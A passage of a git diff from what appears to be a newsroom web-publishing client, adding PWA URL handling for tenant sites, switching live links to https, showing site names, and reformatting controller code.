+++ b/client/components/Output/PreviewPane.jsx
@@ -18,7 +18,7 @@ class PreviewPane extends React.Component {
this.state = {
package: null,
- loading: true
+ loading: true,
};
}
@@ -42,14 +42,16 @@ class PreviewPane extends React.Component {
loadPackage = () => {
this.setState({ loading: true });
- this.context.publisher.getPackage(this.props.package.id).then(response => {
- if (this._isMounted) {
- this.setState({
- loading: false,
- package: response
- });
- }
- });
+ this.context.publisher
+ .getPackage(this.props.package.id)
+ .then((response) => {
+ if (this._isMounted) {
+ this.setState({
+ loading: false,
+ package: response,
+ });
+ }
+ });
};
render() {
@@ -58,12 +60,11 @@ class PreviewPane extends React.Component {
let slideshows = [];
if (this.state.package && this.state.package.extra_items) {
- this.state.package.extra_items.map(gal => {
+ this.state.package.extra_items.map((gal) => {
if (gal.id === "gallery") {
if (gal.items[1] && Number.isInteger(parseInt(gal.items[1].order))) {
gal.items = _.sortBy(gal.items, "order");
}
-
slideshows.push(gal);
}
});
@@ -77,12 +78,12 @@ class PreviewPane extends React.Component {
let article = {
feature_media:
- this.state.package && this.state.package.feature_media
- ? this.state.package.feature_media
+ this.state.package && this.state.package.featured_media
+ ? this.state.package.featured_media
: null,
updated_at: this.props.package.updated_at,
article_statistics: {
- page_views_number: this.props.package.page_views_count
+ page_views_number: this.props.package.page_views_count,
},
comments_count: this.props.package.comments_count,
title: this.props.package.headline,
@@ -94,7 +95,7 @@ class PreviewPane extends React.Component {
? this.props.package.articles[0].paywall_secured
: false,
articles: this.props.package.articles,
- authors: this.props.package.authors ? this.props.package.authors : []
+ authors: this.props.package.authors ? this.props.package.authors : [],
};
return <ArticlePreview article={article} close={this.props.close} />;
@@ -103,7 +104,7 @@ class PreviewPane extends React.Component {
PreviewPane.propTypes = {
close: PropTypes.func.isRequired,
- package: PropTypes.object
+ package: PropTypes.object,
};
export default PreviewPane;
diff --git a/client/components/Output/PublishPane/Preview.jsx b/client/components/Output/PublishPane/Preview.jsx
index 006c7f0d..b09b24d2 100644
--- a/client/components/Output/PublishPane/Preview.jsx
+++ b/client/components/Output/PublishPane/Preview.jsx
@@ -28,13 +28,20 @@ class Preview extends React.Component {
let token = this.context.publisher.getToken();
let destination = this.props.item;
- let tenantUrl = destination.tenant.subdomain
- ? destination.tenant.subdomain + "." + destination.tenant.domain_name
- : destination.tenant.domain_name;
+ console.log(destination);
+
+ let tenantUrl =
+ destination.tenant.pwa_config && destination.tenant.pwa_config.url
+ ? destination.tenant.pwa_config.url
+ : destination.tenant.subdomain
+ ? "//" +
+ destination.tenant.subdomain +
+ "." +
+ destination.tenant.domain_name
+ : "//" + destination.tenant.domain_name;
let urls = {
regular:
- "//" +
tenantUrl +
"/preview/package/" +
destination.route.id +
@@ -43,7 +50,6 @@ class Preview extends React.Component {
"?auth_token=" +
token,
amp:
- "//" +
tenantUrl +
"/preview/package/" +
destination.route.id +
diff --git a/client/components/Output/PublishPane/PublishPane.jsx b/client/components/Output/PublishPane/PublishPane.jsx
index d3687f14..8a5a8902 100644
--- a/client/components/Output/PublishPane/PublishPane.jsx
+++ b/client/components/Output/PublishPane/PublishPane.jsx
@@ -77,9 +77,12 @@ class PublishPane extends React.Component {
});
if (tenant && item.route) {
- let tenantUrl = tenant.subdomain
- ? tenant.subdomain + "." + tenant.domain_name
- : tenant.domain_name;
+ let tenantUrl =
+ tenant.pwa_config && tenant.pwa_config.url
+ ? tenant.pwa_config.url
+ : tenant.subdomain
+ ? "https://" + tenant.subdomain + "." + tenant.domain_name
+ : "https://" + tenant.domain_name;
destinations.push({
tenant: tenant,
@@ -93,7 +96,7 @@ class PublishPane extends React.Component {
slug: item.slug,
live_url:
item.status === "published"
- ? "http://" + tenantUrl + item._links.online.href
+ ? tenantUrl + item._links.online.href
: null,
});
}
diff --git a/client/components/Output/Swimlane/TenantBoard.jsx b/client/components/Output/Swimlane/TenantBoard.jsx
index a74e8898..7b2c57e3 100644
--- a/client/components/Output/Swimlane/TenantBoard.jsx
+++ b/client/components/Output/Swimlane/TenantBoard.jsx
@@ -127,10 +127,18 @@ class TenantBoard extends React.Component {
item.page_views_count = helpers.countPageViews(item.articles);
item.articles.forEach((item) => {
if (item.route && item.status == "published" && item.tenant) {
- let tenantUrl = item.tenant.subdomain
- ? item.tenant.subdomain + "." + item.tenant.domain_name
- : item.tenant.domain_name;
- item.live_url = "http://" + tenantUrl + item._links.online.href;
+ let tenantUrl =
+ item.tenant &&
+ item.tenant.pwa_config &&
+ item.tenant.pwa_config.url
+ ? item.tenant.pwa_config.url
+ : item.tenant.subdomain
+ ? "https://" +
+ item.tenant.subdomain +
+ "." +
+ item.tenant.domain_name
+ : "https://" + item.tenant.domain_name;
+ item.live_url = tenantUrl + item._links.online.href;
}
});
});
diff --git a/client/components/TargetedPublishing/AddWebsite.jsx b/client/components/TargetedPublishing/AddWebsite.jsx
index 26c6dbdb..f1336212 100644
--- a/client/components/TargetedPublishing/AddWebsite.jsx
+++ b/client/components/TargetedPublishing/AddWebsite.jsx
@@ -87,21 +87,15 @@ class AddWebsite extends React.Component {
<div style={{ padding: "1.5rem" }}>
<h3 className="tp-dropdown-heading">Add Website</h3>
<ul className="simple-list--dotted simple-list">
- {remainingSites.map((site) => {
- let siteDomain = site.subdomain
- ? site.subdomain + "." + site.domain_name
- : site.domain_name;
-
- return (
- <li
- key={site.id}
- className="simple-list__item tp-dropdown-li"
- onClick={() => this.addDestination(site)}
- >
- {siteDomain}
- </li>
- );
- })}
+ {remainingSites.map((site) => (
+ <li
+ key={site.id}
+ className="simple-list__item tp-dropdown-li"
+ onClick={() => this.addDestination(site)}
+ >
+ {site.name}
+ </li>
+ ))}
</ul>
</div>
</div>
diff --git a/client/components/TargetedPublishing/Destination.jsx b/client/components/TargetedPublishing/Destination.jsx
index 6e174d58..6f7d0bcf 100644
--- a/client/components/TargetedPublishing/Destination.jsx
+++ b/client/components/TargetedPublishing/Destination.jsx
@@ -9,9 +9,6 @@ import { Label, IconButton } from "superdesk-ui-framework/react";
import ContentLists from "./ContentLists";
import RouteSelect from "./RouteSelect";
import PublishingOptionSwitches from "../generic/PublishingOptionSwitches";
-
-import SaveBar from "../UI/SaveBar";
-
class Destination extends Component {
constructor(props) {
super(props);
@@ -21,6 +18,8 @@ class Destination extends Component {
const protocol = pubConfig.protocol || "https";
let subdomain = null;
let domainName = null;
+ let pwaUrl = null;
+ let siteName = null;
let hasOutputChannel = false;
let hasFbiaEnabled = false;
let hasPaywallEnabled = false;
@@ -50,6 +49,11 @@ class Destination extends Component {
hasOutputChannel = props.site.output_channel;
subdomain = props.site.subdomain ? props.site.subdomain : "";
domainName = props.site.domain_name;
+ siteName = props.site.name;
+ pwaUrl =
+ props.site.pwa_config && props.site.pwa_config.url
+ ? props.site.pwa_config.url
+ : null;
} else if (props.rule) {
destination.tenant = props.rule.tenant.code;
destination.route = props.rule.route ? props.rule.route.id : null;
@@ -74,6 +78,11 @@ class Destination extends Component {
? props.rule.tenant.subdomain
: "";
domainName = props.rule.tenant.domain_name;
+ siteName = props.rule.tenant.name;
+ pwaUrl =
+ props.rule.tenant.pwa_config && props.rule.tenant.pwa_config.url
+ ? props.rule.tenant.pwa_config.url
+ : null;
}
}
@@ -88,6 +97,8 @@ class Destination extends Component {
: "",
subdomain: subdomain ? subdomain : "",
domainName: domainName ? domainName : "",
+ pwaUrl: pwaUrl,
+ siteName: siteName ? siteName : "",
hasOutputChannel: hasOutputChannel ? hasOutputChannel : false,
hasPaywallEnabled: hasPaywallEnabled ? hasPaywallEnabled : false,
hasAppleNewsEnabled: hasAppleNewsEnabled ? true : false,
@@ -122,6 +133,8 @@ class Destination extends Component {
const protocol = pubConfig.protocol || "https";
let subdomain = null;
let domainName = null;
+ let pwaUrl = null;
+ let siteName = null;
let hasOutputChannel = false;
let hasFbiaEnabled = false;
let hasPaywallEnabled = false;
@@ -138,6 +151,11 @@ class Destination extends Component {
hasOutputChannel = props.site.output_channel;
subdomain = props.site.subdomain ? props.site.subdomain : "";
domainName = props.site.domain_name;
+ siteName = props.site.name;
+ pwaUrl =
+ props.site.pwa_config && props.site.pwa_config.url
+ ? props.site.pwa_config.url
+ : null;
} else if (props.rule) {
destination.tenant = props.rule.tenant.code;
destination.route = props.rule.route ? props.rule.route.id : null;
@@ -162,6 +180,11 @@ class Destination extends Component {
? props.rule.tenant.subdomain
: "";
domainName = props.rule.tenant.domain_name;
+ siteName = props.rule.tenant.name;
+ pwaUrl =
+ props.rule.tenant.pwa_config && props.rule.tenant.pwa_config.url
+ ? props.rule.tenant.pwa_config.url
+ : null;
}
this.setState(
@@ -172,6 +195,8 @@ class Destination extends Component {
}${domainName}/api/v2/`,
subdomain: subdomain,
domainName: domainName,
+ pwaUrl: pwaUrl,
+ siteName: siteName,
hasOutputChannel: hasOutputChannel,
hasPaywallEnabled: hasPaywallEnabled,
hasAppleNewsEnabled: hasAppleNewsEnabled,
@@ -209,8 +234,17 @@ class Destination extends Component {
{ headers: this.props.apiHeader }
)
.then((res) => {
+ let previewUrl = res.data.preview_url;
+
+ if (this.state.pwaUrl) {
+ const regex = /preview\/publish\/package\/([a-zA-Z0-9]+)/gm;
+ const match = regex.exec(previewUrl);
+
+ previewUrl = this.state.pwaUrl + "/preview/token/" + match[1];
+ }
+
this.setState({
- previewUrl: res.data.preview_url,
+ previewUrl: previewUrl,
});
return res;
});
@@ -301,10 +335,6 @@ class Destination extends Component {
render() {
if (this.state.deleted) return null;
-
- let siteDomain = this.state.subdomain
- ? this.state.subdomain + "." + this.state.domainName
- : this.state.domainName;
const destination = { ...this.state.destination };
let contentListsNames = "";
@@ -360,7 +390,7 @@ class Destination extends Component {
<div className="sd-list-item__row">
<span className="sd-overflow-ellipsis sd-list-item--element-grow">
<span className="sd-list-item__text-strong">
- {siteDomain}
+ {this.state.siteName}
</span>
</span>
</div>
@@ -405,7 +435,7 @@ class Destination extends Component {
<div className="sd-list-item__column sd-list-item__column--grow sd-list-item__column--no-border">
<div className="sd-list-item__row">
<span className="sd-overflow-ellipsis sd-list-item--element-grow sd-list-item__text-strong">
- {siteDomain}
+ {this.state.siteName}
</span>
{preview}
</div>
diff --git a/client/components/generic/PreviewStatusLabels.jsx b/client/components/generic/PreviewStatusLabels.jsx
index ea78aed5..d24657f6 100644
--- a/client/components/generic/PreviewStatusLabels.jsx
+++ b/client/components/generic/PreviewStatusLabels.jsx
@@ -27,14 +27,19 @@ const PreviewStatusLabels = ({ articles }) => {
article={article}
style={{ marginRight: ".6em" }}
url={
- article.tenant
+ article.tenant &&
+ article.tenant.pwa_config &&
+ article.tenant.pwa_config.url
+ ? article.tenant.pwa_config.url +
+ article._links.online.href
+ : article.tenant
? article.tenant.subdomain
- ? "http://" +
+ ? "https://" +
article.tenant.subdomain +
"." +
article.tenant.domain_name +
article._links.online.href
- : "http://" +
+ : "https://" +
article.tenant.domain_name +
article._links.online.href
: null
diff --git a/client/controllers/WebPublisherDashboardController.js b/client/controllers/WebPublisherDashboardController.js
index 6659ca8c..51c917d4 100644
--- a/client/controllers/WebPublisherDashboardController.js
+++ b/client/controllers/WebPublisherDashboardController.js
@@ -10,20 +10,15 @@ import React from "react";
import ReactDOM from "react-dom";
import Dashboard from "../components/Dashboard/Dashboard";
-WebPublisherDashboardController.$inject = [
- "publisher"
-];
-export function WebPublisherDashboardController(
- publisher
-) {
+WebPublisherDashboardController.$inject = ["publisher"];
+export function WebPublisherDashboardController(publisher) {
class WebPublisherDashboard {
constructor() {
this.publisher = publisher;
+ this.publisher.setTenant();
ReactDOM.render(
- <Dashboard
- publisher={this.publisher}
- />,
+ <Dashboard publisher={this.publisher} />,
document.getElementById("sp-dashboard-react-app")
);
}
diff --git a/client/controllers/WebPublisherErrorLogController.js b/client/controllers/WebPublisherErrorLogController.js
index 64874577..0c124fa9 100644
--- a/client/controllers/WebPublisherErrorLogController.js
+++ b/client/controllers/WebPublisherErrorLogController.js
@@ -10,20 +10,15 @@ import React from "react";
import ReactDOM from "react-dom";
import ErrorLog from "../components/ErrorLog/ErrorLog";
-WebPublisherErrorLogController.$inject = [
- "publisher"
-];
-export function WebPublisherErrorLogController(
- publisher
-) {
+WebPublisherErrorLogController.$inject = ["publisher"];
+export function WebPublisherErrorLogController(publisher) {
class WebPublisherErrorLog {
constructor() {
this.publisher = publisher;
+ this.publisher.setTenant();
ReactDOM.render(
- <ErrorLog
- publisher={this.publisher}
- />,
+ <ErrorLog publisher={this.publisher} />,
document.getElementById("sp-error-log-react-app")
);
}
diff --git a/client/controllers/WebPublisherOutputController.js b/client/controllers/WebPublisherOutputController.js
index 277519f4..1bebbfd0 100644
--- a/client/controllers/WebPublisherOutputController.js
+++ b/client/controllers/WebPublisherOutputController.js
@@ -18,7 +18,7 @@ WebPublisherOutputController.$inject = [
"vocabularies",
"notify",
"config",
- "api"
+ "api",
];
export function WebPublisherOutputController(
$scope,
@@ -34,14 +34,19 @@ export function WebPublisherOutputController(
this.editorOpen = false;
let isLanguagesEnabled = false;
- vocabularies.getVocabularies().then(res => {
- let languages = res.find(v => v._id === "languages");
- languages = languages && languages.items ? languages.items.filter(l => l.is_active) : [];
+ vocabularies.getVocabularies().then((res) => {
+ let languages = res.find((v) => v._id === "languages");
+ languages =
+ languages && languages.items
+ ? languages.items.filter((l) => l.is_active)
+ : [];
if (languages.length > 1) {
isLanguagesEnabled = true;
}
+ publisher.setTenant();
+
ReactDOM.render(
React.createElement(Output, {
publisher: publisher,
@@ -50,21 +55,19 @@ export function WebPublisherOutputController(
authoringWorkspace: authoringWorkspace,
api: api,
isLanguagesEnabled: isLanguagesEnabled,
- languages: languages
+ languages: languages,
}),
document.getElementById("sp-output-react-app")
);
- })
+ });
- $scope.$watch(authoringWorkspace.getState, state => {
+ $scope.$watch(authoringWorkspace.getState, (state) => {
this.editorOpen = state && state.item ? true : false;
let event = new CustomEvent("isSuperdeskEditorOpen", {
- detail: this.editorOpen
+ detail: this.editorOpen,
});
document.dispatchEvent(event);
});
-
-
}
}
diff --git a/client/controllers/WebPublisherSettingsController.js b/client/controllers/WebPublisherSettingsController.js
index 39bf1a7f..64a0cbbc 100644
--- a/client/controllers/WebPublisherSettingsController.js
+++ b/client/controllers/WebPublisherSettingsController.js
@@ -13,7 +13,7 @@ WebPublisherSettingsController.$inject = [
"vocabularies",
"$sce",
"notify",
- "api"
+ "api",
];
export function WebPublisherSettingsController(
$scope,
@@ -33,9 +33,12 @@ export function WebPublisherSettingsController(
this.isLanguagesEnabled = false;
- vocabularies.getVocabularies().then(res => {
- this.languages = res.find(v => v._id === "languages");
- this.languages = this.languages && this.languages.items ? this.languages.items.filter(l => l.is_active) : [];
+ vocabularies.getVocabularies().then((res) => {
+ this.languages = res.find((v) => v._id === "languages");
+ this.languages =
+ this.languages && this.languages.items
+ ? this.languages.items.filter((l) => l.is_active)
+ : [];
if (this.languages.length > 1) {
this.isLanguagesEnabled = true;
@@ -48,33 +51,34 @@ export function WebPublisherSettingsController(
publisher
.setToken()
.then(publisher.querySites)
- .then(sites => {
+ .then((sites) => {
this.sites = sites;
$scope.mainLoading = false;
// loading routes
angular.forEach(this.sites, (siteObj, key) => {
publisher.setTenant(siteObj);
- publisher.queryRoutes({ type: "collection" }).then(routes => {
+ publisher.queryRoutes({ type: "collection" }).then((routes) => {
siteObj.routes = routes;
});
});
+ publisher.setTenant();
// rules panel is default
this.changePanel("tenant");
});
}
loadAuthors(page = 0) {
-
- api.users.query({
- max_results: 200,
- page: page,
- sort: '[("first_name", 1), ("last_name", 1)]',
- where: {
- is_support: { $ne: true }
- }
- })
- .then(response => {
- let authors = response._items.filter(item => item.is_author);
+ api.users
+ .query({
+ max_results: 200,
+ page: page,
+ sort: '[("first_name", 1), ("last_name", 1)]',
+ where: {
+ is_support: { $ne: true },
+ },
+ })
+ .then((response) => {
+ let authors = response._items.filter((item) => item.is_author);
if (authors.length) this.authors = [...this.authors, ...authors];
if (response._links.next) this.loadAuthors(page + 1);
@@ -117,7 +121,7 @@ export function WebPublisherSettingsController(
/**
* @ngdoc method
* @name WebPublisherSettingsController#toggleSiteWizard
- * @param {String} outputChannelType - channel type (eg wordpress, drupal)
+ * @param {String} outputChannelType - channel type (eg wordpress, drupal, PWA)
* @description Toggles site creation wizard
*/
toggleSiteWizard(outputChannelType) {
@@ -145,8 +149,8 @@ export function WebPublisherSettingsController(
case "routes":
this.routeType = "";
// getting only route redirects to fill route objects
- this.redirectType = "route";
- this.loadRedirects(true, 100000).then(redirects => this._refreshRoutes(redirects));
+ this.redirectType = "";
+ this._refreshRoutes();
break;
case "redirects":
@@ -211,11 +215,12 @@ export function WebPublisherSettingsController(
publisher
.manageWebhook(_.pick(newWebhook, updatedKeys), this.selectedWebhook.id)
- .then(webhook => {
+ .then((webhook) => {
this.webhookPaneOpen = false;
this.selectedWebhook = {};
this._refreshWebhooks();
- }).catch(err => {
+ })
+ .catch((err) => {
$scope.loading = false;
let message = err.data.message
? err.data.message
@@ -238,7 +243,7 @@ export function WebPublisherSettingsController(
this._refreshWebhooks();
})
)
- .catch(err => {
+ .catch((err) => {
let message = err.data.message
? err.data.message
: "Something went wrong. Try again.";
@@ -253,7 +258,7 @@ export function WebPublisherSettingsController(
*/
_refreshWebhooks() {
$scope.loading = true;
- publisher.getWebhooks().then(webhooks => {
+ publisher.getWebhooks().then((webhooks) => {
this.webhooks = webhooks;
$scope.loading = false;
});
@@ -290,9 +295,9 @@ export function WebPublisherSettingsController(
const regex = /\/{([a-zA-Z0-9]*)}/gm;
let match = regex.exec($scope.newRoute.variable_pattern);
- $scope.newRoute.variableName = match[1] ? match[1] : '';
+ $scope.newRoute.variableName = match[1] ? match[1] : "";
- delete $scope.newRoute.requirements
+ delete $scope.newRoute.requirements;
delete $scope.newRoute.variable_pattern;
}
@@ -307,21 +312,20 @@ export function WebPublisherSettingsController(
* @description Saving route
*/
saveRoute() {
-
if ($scope.newRoute.type === "custom") {
- $scope.newRoute.variable_pattern = "/{" + $scope.newRoute.variableName + "}";
+ $scope.newRoute.variable_pattern =
+ "/{" + $scope.newRoute.variableName + "}";
$scope.newRoute.requirements = [
{
- "key": $scope.newRoute.variableName,
- "value": "[a-zA-Z\\-_]+"
- }
+ key: $scope.newRoute.variableName,
+ value: "[a-zA-Z\\-_]+",
+ },
];
delete $scope.newRoute.variableName;
}
-
let updatedKeys = this._updatedKeys($scope.newRoute, this.selectedRoute);
// only for updating, parent is received as object but for update id is needed
@@ -334,7 +338,7 @@ export function WebPublisherSettingsController(
_.pick($scope.newRoute, updatedKeys),
this.selectedRoute.id
)
- .then(route => {
+ .then((route) => {
this.paneOpen = false;
this._refreshRoutes();
});
@@ -354,7 +358,7 @@ export function WebPublisherSettingsController(
this._refreshRoutes();
})
)
- .catch(err => {
+ .catch((err) => {
let message = err.data.message
? err.data.message
: "Something went wrong. Try again.";
@@ -394,7 +398,7 @@ export function WebPublisherSettingsController(
if (removedItem) {
removedItem.removed = true;
- parent.children = parent.children.filter(item => !item.removed);
+ parent.children = parent.children.filter((item) => !item.removed);
}
} else if (!item.parent) {
// item was top level and was moved to other list
@@ -403,7 +407,7 @@ export function WebPublisherSettingsController(
if (removedItem) {
removedItem.removed = true;
$scope.routes.children = $scope.routes.children.filter(
- item => !item.removed
+ (item) => !item.removed
);
}
}
@@ -412,7 +416,7 @@ export function WebPublisherSettingsController(
.slice(0, index)
.concat(item)
.concat(list.children.slice(index))
- .filter(item => !item.removed);
+ .filter((item) => !item.removed);
let parentId = list.children[0].parent;
let newPosition = list.children.indexOf(item);
@@ -435,55 +439,49 @@ export function WebPublisherSettingsController(
* @ngdoc method
* @name WebPublisherSettingsController#_refreshRoutes
* @private
- * @param {Array} redirects - list of redirects
* @description Loads list of routes
*/
- _refreshRoutes(redirects) {
+ _refreshRoutes() {
$scope.loading = true;
- publisher.queryRoutes().then(routes => {
+ publisher.queryRoutes().then((routes) => {
$scope.loading = false;
let filteredRoutes = { children: null };
if (this.routeType === "content") {
filteredRoutes.children = routes.filter(
- item => item.type === "content"
+ (item) => item.type === "content"
);
} else if (this.routeType === "collection") {
filteredRoutes.children = routes
- .filter(item => item.type === "collection")
- .filter(item => !item.parent);
+ .filter((item) => item.type === "collection")
+ .filter((item) => !item.parent);
} else {
- filteredRoutes.children = routes.filter(item => !item.parent);
+ filteredRoutes.children = routes.filter((item) => !item.parent);
}
- if (redirects && redirects.length) {
- filteredRoutes.children.forEach(route => {
- let routeRedirect = redirects.find(r => {
- return r.route_source.id === route.id
- }
- );
- if (routeRedirect) route.redirect = routeRedirect;
- })
- }
$scope.routes = filteredRoutes;
+ $scope.routes_flat = this._flattenTree(filteredRoutes);
});
}
// ---------------------------------- REDIRECTS
/**
- * @ngdoc method
- * @name WebPublisherSettingsController#toogleCreateRedirect
- * @param {Boolean} paneOpen - should pane be open
- * @param {String} kind - type of redirect
- * @description Opens window for creating new redirect
- */
- toggleCreateRedirect(paneOpen, kind = 'route') {
+ * @ngdoc method
+ * @name WebPublisherSettingsController#toogleCreateRedirect
+ * @param {Boolean} paneOpen - should pane be open
+ * @param {String} kind - type of redirect
+ * @description Opens window for creating new redirect
+ */
+ toggleCreateRedirect(paneOpen, kind = "route") {
this.selectedRedirect = {};
$scope.newRedirect = { kind: kind, permanent: "true" };
this.paneOpen = paneOpen;
}
onChangeRedirectKind() {
- $scope.newRedirect = { kind: $scope.newRedirect.kind, permanent: $scope.newRedirect.permanent };
+ $scope.newRedirect = {
+ kind: $scope.newRedirect.kind,
+ permanent: $scope.newRedirect.permanent,
+ };
}
changeRedirectFilter(type) {
@@ -492,20 +490,21 @@ export function WebPublisherSettingsController(
}
saveRedirect() {
- let updatedKeys = this._updatedKeys($scope.newRedirect, this.selectedRedirect);
+ let updatedKeys = this._updatedKeys(
+ $scope.newRedirect,
+ this.selectedRedirect
+ );
let newRedirect = _.pick($scope.newRedirect, updatedKeys);
delete newRedirect.kind;
publisher
- .manageRedirect(
- newRedirect,
- this.selectedRedirect.id
- )
- .then(r => {
+ .manageRedirect(newRedirect, this.selectedRedirect.id)
+ .then((r) => {
this.toggleCreateRedirect(false);
this.loadRedirects(true);
- }).catch(err => {
+ })
+ .catch((err) => {
let message = err.data.message
? err.data.message
: "Something went wrong. Try again.";
@@ -516,7 +515,7 @@ export function WebPublisherSettingsController(
editRedirect(redirect) {
let editedRedirect = {
permanent: redirect.permanent ? "true" : "false",
- id: redirect.id
+ id: redirect.id,
};
if (redirect.route_target && redirect.route_source) {
@@ -540,11 +539,13 @@ export function WebPublisherSettingsController(
.confirm(gettext("Please confirm you want to delete redirect."))
.then(() =>
publisher.removeRedirect(id).then(() => {
- let index = $scope.redirects.items.findIndex(redirect => redirect.id === id);
+ let index = $scope.redirects.items.findIndex(
+ (redirect) => redirect.id === id
+ );
if (index !== -1) $scope.redirects.items.splice(index, 1);
})
)
- .catch(err => {
+ .catch((err) => {
let message = err.data.message
? err.data.message
: "Something went wrong. Try again.";
@@ -555,43 +556,47 @@ export function WebPublisherSettingsController(
loadRedirects(reset, limit) {
if (reset) $scope.redirects = { items: [], pages: 1 };
-
const page = !$scope.redirects.page ? 1 : $scope.redirects.page + 1;
const params = {
page: page,
limit: limit ? limit : 50,
- "sorting[createdAt]": "desc"
+ "sorting[createdAt]": "desc",
};
- if ((!reset && $scope.redirects.pages && page > $scope.redirects.pages) || $scope.redirects.loading) {
+ if (
+ (!reset && $scope.redirects.pages && page > $scope.redirects.pages) ||
+ $scope.redirects.loading
+ ) {
return;
}
$scope.redirects.loading = true;
- return publisher.queryRedirects(params).then(redirects => {
+ return publisher.queryRedirects(params).then((redirects) => {
let filteredRedirects = redirects._embedded._items;
if (this.redirectType === "route") {
filteredRedirects = filteredRedirects.filter(
- redirect => redirect.route_target && redirect.route_source
+ (redirect) => redirect.route_target && redirect.route_source
);
} else if (this.redirectType === "custom") {
filteredRedirects = filteredRedirects.filter(
- redirect => !redirect.route_target && !redirect.route_source
+ (redirect) => !redirect.route_target && !redirect.route_source
);
}
$scope.redirects.loading = false;
$scope.redirects.page = page;
$scope.redirects.pages = redirects.pages;
- $scope.redirects.items = [...$scope.redirects.items, ...filteredRedirects];
+ $scope.redirects.items = [
+ ...$scope.redirects.items,
+ ...filteredRedirects,
+ ];
return $scope.redirects.items;
});
}
-
// ---------------------------------- NAVIGATION
/**
@@ -644,11 +649,15 @@ export function WebPublisherSettingsController(
}
if ($scope.newMenu.route) {
- let route = $scope.routes.find(r => r.id === $scope.newMenu.route);
- if (route.type === 'custom') {
- let valueSlug = $scope.newMenu.variableValue.toLowerCase().replaceAll(" ", "-");
-
- $scope.newMenu.uri = valueSlug.length ? route.static_prefix + "/" + valueSlug : route.static_prefix;
+ let route = $scope.routes.find((r) => r.id === $scope.newMenu.route);
+ if (route.type === "custom") {
+ let valueSlug = $scope.newMenu.variableValue
+ .toLowerCase()
+ .replaceAll(" ", "-");
+
+ $scope.newMenu.uri = valueSlug.length
+ ? route.static_prefix + "/" + valueSlug
+ : route.static_prefix;
delete $scope.newMenu.route;
delete $scope.newMenu.variableValue;
}
@@ -686,7 +695,7 @@ export function WebPublisherSettingsController(
editMenuTree(menu) {
$scope.menu = menu;
$scope.menusInTree = this._flattenTree(menu);
- publisher.queryRoutes().then(routes => {
+ publisher.queryRoutes().then((routes) => {
$scope.routes = routes;
});
this.changeManageTab("navigation-menu");
@@ -728,14 +737,14 @@ export function WebPublisherSettingsController(
isRouteTypeCustom(routeId) {
if (!$scope.routes || !$scope.routes.length) return null;
- let route = $scope.routes.find(r => r.id === routeId);
- return route.type === 'custom';
+ let route = $scope.routes.find((r) => r.id === routeId);
+ return route.type === "custom";
}
getRouteNameById(routeId) {
if (!$scope.routes || !$scope.routes.length) return null;
- let route = $scope.routes.find(r => r.id === routeId);
+ let route = $scope.routes.find((r) => r.id === routeId);
return route.name;
}
@@ -761,7 +770,7 @@ export function WebPublisherSettingsController(
navigationMenuSetUri() {
if ($scope.newMenu.route) {
let route = $scope.routes.find(
- route => route.id === $scope.newMenu.route
+ (route) => route.id === $scope.newMenu.route
);
$scope.newMenu.uri = route.staticPrefix;
@@ -805,7 +814,7 @@ export function WebPublisherSettingsController(
.slice(0, index)
.concat(item)
.concat(list.children.slice(index))
- .filter(item => !item.removed);
+ .filter((item) => !item.removed);
let menuPosition = list.children.indexOf(item);
@@ -828,7 +837,7 @@ export function WebPublisherSettingsController(
*/
_refreshCurrentMenu() {
this.menuPaneOpen = false;
- publisher.getMenu($scope.menu.id).then(menu => {
+ publisher.getMenu($scope.menu.id).then((menu) => {
$scope.menu = menu;
$scope.menusInTree = this._flattenTree(menu);
});
@@ -844,7 +853,7 @@ export function WebPublisherSettingsController(
$scope.loading = true;
this.menuAdd = false;
this.menuPaneOpen = false;
- publisher.queryMenus().then(menus => {
+ publisher.queryMenus().then((menus) => {
$scope.loading = false;
$scope.menus = menus;
});
@@ -913,21 +922,29 @@ export function WebPublisherSettingsController(
let filteredNewSite = { ...$scope.newSite };
delete filteredNewSite.updated_at;
- if (filteredNewSite.apple_news_config === null) filteredNewSite.apple_news_config = { api_key_id: null, api_key_secret: null, channel_id: null };
+ if (filteredNewSite.apple_news_config === null)
+ filteredNewSite.apple_news_config = {
+ api_key_id: null,
+ api_key_secret: null,
+ channel_id: null,
+ };
let updatedKeys = this._updatedKeys(filteredNewSite, this.selectedSite);
this.loading = true;
publisher
- .manageSite(_.pick(filteredNewSite, updatedKeys), this.selectedSite.code)
- .then(site => {
+ .manageSite(
+ _.pick(filteredNewSite, updatedKeys),
+ this.selectedSite.code
+ )
+ .then((site) => {
this.siteForm.$setPristine();
this.selectedSite = site;
this.loading = false;
publisher.setTenant(site);
this._refreshSites();
})
- .catch(err => {
+ .catch((err) => {
$scope.newSite = angular.copy(this.selectedSite);
this.loading = false;
});
@@ -949,7 +966,7 @@ export function WebPublisherSettingsController(
publisher.setTenant();
this._refreshSites();
})
- .catch(err => {
+ .catch((err) => {
if (err.status === 409) {
modal
.confirm(
@@ -969,7 +986,11 @@ export function WebPublisherSettingsController(
}
switchAppleNewsConfig() {
- $scope.newSite.apple_news_config = $scope.newSite.apple_news_config === null || $scope.newSite.apple_news_config.channel_id === null ? { api_key_id: '', api_key_secret: '', channel_id: '' } : null;
+ $scope.newSite.apple_news_config =
+ $scope.newSite.apple_news_config === null ||
+ $scope.newSite.apple_news_config.channel_id === null
+ ? { api_key_id: "", api_key_secret: "", channel_id: "" }
+ : null;
this.siteForm.$setDirty();
}
@@ -1012,10 +1033,10 @@ export function WebPublisherSettingsController(
* @description Saving theme settings and logo
*/
saveThemeSettings() {
- let settingsToSave = _.map($scope.newThemeSettings.settings, value => {
+ let settingsToSave = _.map($scope.newThemeSettings.settings, (value) => {
return _.pick(value, ["name", "value"]);
});
- publisher.saveSettings({ bulk: settingsToSave }).then(settings => {
+ publisher.saveSettings({ bulk: settingsToSave }).then((settings) => {
this.themeSettingsForm.$setPristine();
});
}
@@ -1035,12 +1056,12 @@ export function WebPublisherSettingsController(
if (!logoFile.$error) {
publisher
.uploadThemeLogo({ logo: logoFile }, type)
- .then(response => {
+ .then((response) => {
this.themeSettings[type] = response.data;
let flagName = "replace_" + type;
this[flagName] = false;
})
- .catch(err => {
+ .catch((err) => {
$scope.newThemeSettings[type].error = true;
});
}
@@ -1058,7 +1079,7 @@ export function WebPublisherSettingsController(
$scope.newRule = {
type: type,
destinations: [],
- expressions: [{}]
+ expressions: [{}],
};
this.rulePaneOpen = type ? true : false;
@@ -1072,7 +1093,7 @@ export function WebPublisherSettingsController(
* @description gets tenant name by its code
*/
getTenantNameByCode(code) {
- let tenant = this.sites.find(site => {
+ let tenant = this.sites.find((site) => {
return site.code == code;
});
@@ -1086,7 +1107,7 @@ export function WebPublisherSettingsController(
